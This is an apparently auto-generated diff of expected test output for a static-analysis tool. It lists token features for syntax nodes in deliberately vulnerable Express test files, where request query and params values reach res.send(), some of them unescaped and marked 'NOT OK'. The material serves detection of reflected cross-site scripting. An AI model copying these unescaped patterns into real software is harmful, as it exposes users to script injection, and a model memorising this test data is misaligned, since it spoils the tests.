contextFunctionInterfaces | | @@ -21867,6 +145660,56 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | x => escapeHtml(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | | autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | x => escapeHtml(x) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | x => escapeHtml(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:25 | escapeHtml | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:25 | escapeHtml | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:25 | escapeHtml | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:25 | escapeHtml | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:25 | escapeHtml | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | escapeHtml(x) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | escapeHtml(x) | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | escapeHtml(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | escapeHtml(x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | escapeHtml(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | exceptional return of escapeHtml(x) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | exceptional return of escapeHtml(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | exceptional return of escapeHtml(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | exceptional return of escapeHtml(x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:16:9:28 | exceptional return of escapeHtml(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:6:10:9 | then | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:6:10:9 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:10:6:10:9 | then | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:6:10:9 | then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:6:10:9 | then | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:10 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:10 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:10 | res | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:10 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:10 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:11 | x | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | 'arguments' object of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | exceptional return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | exceptional return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | x => res.send(x) | CalleeFlexibleAccessPath | Promise().then().then | | autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | x => res.send(x) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | x => res.send(x) | contextFunctionInterfaces | | @@ -21874,6 +145717,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | x => res.send(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | | autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | x => res.send(x) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/promises.js:10:11:10:26 | x => res.send(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:18 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:18 | res | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:18 | res | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:18 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:18 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:23 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:23 | res.send | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:23 | res.send | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:23 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:23 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | exceptional return of res.send(x) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | exceptional return of res.send(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | exceptional return of res.send(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | exceptional return of res.send(x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | exceptional return of res.send(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | res.send(x) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | res.send(x) | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | res.send(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | res.send(x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:16:10:26 | res.send(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:10:20:10:23 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:10:20:10:23 | send | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:10:20:10:23 | send | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:10:20:10:23 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:10:20:10:23 | send | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:10:25:10:25 | x | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/promises.js:10:25:10:25 | x | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:10:25:10:25 | x | contextFunctionInterfaces | | @@ -21882,12 +145750,87 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:10:25:10:25 | x | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/promises.js:10:25:10:25 | x | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:10:25:10:25 | x | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:0 | this | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | aKnownValue | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | aKnownValue | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | aKnownValue | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | clone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | clone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | clone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | fclone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | fclone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | fclone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | jc | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | jc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | jc | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | require | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | serializeJavaScript | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | serializeJavaScript | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | serializeJavaScript | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | sortKeys | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | sortKeys | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:1:1:1 | sortKeys | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:11 | express | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:32 | express | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:5:1:32 | express ... press') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:21 | require | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:32 | exceptional return of require('express') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:1:15:1:32 | require('express') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/tst2.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/tst2.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst2.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:1:23:1:31 | 'express' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:7 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:19 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:5:3:19 | app = express() | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:17 | express | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:19 | exceptional return of express() | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:3:11:3:19 | express() | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:5:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:5:3 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:5:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:5:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:5:7 | app.get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:9:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:9:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:9:2 | app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:9:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:9:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:1:9:2 | exceptional return of app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:5:5:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:5:5:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:5:5:7 | get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:5:9:5:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:5:9:5:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:5:9:5:19 | '/user/:id' | calleeImports | express | @@ -21895,6 +145838,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:5:9:5:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:5:9:5:19 | '/user/:id' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:5:9:5:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:5:21 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:5:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:5:21 | this | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:5:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:5:21 | this | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | 'arguments' object of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | exceptional return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | functio ... OT OK\\n} | calleeImports | express | @@ -21902,6 +145860,131 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | functio ... OT OK\\n} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | return of anonymous function | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:5:22:9:1 | return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:31:5:33 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:5:36:5:38 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:17 | { p, q: r } | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:17 | { p, q: r } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:17 | { p, q: r } | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:17 | { p, q: r } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:17 | { p, q: r } | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | p | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | r | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | r | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | r | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | r | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | r | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | { p, q: ... .params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | { p, q: ... .params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | { p, q: ... .params | enclosingFunctionBody | req res p q r req params res send p res send r 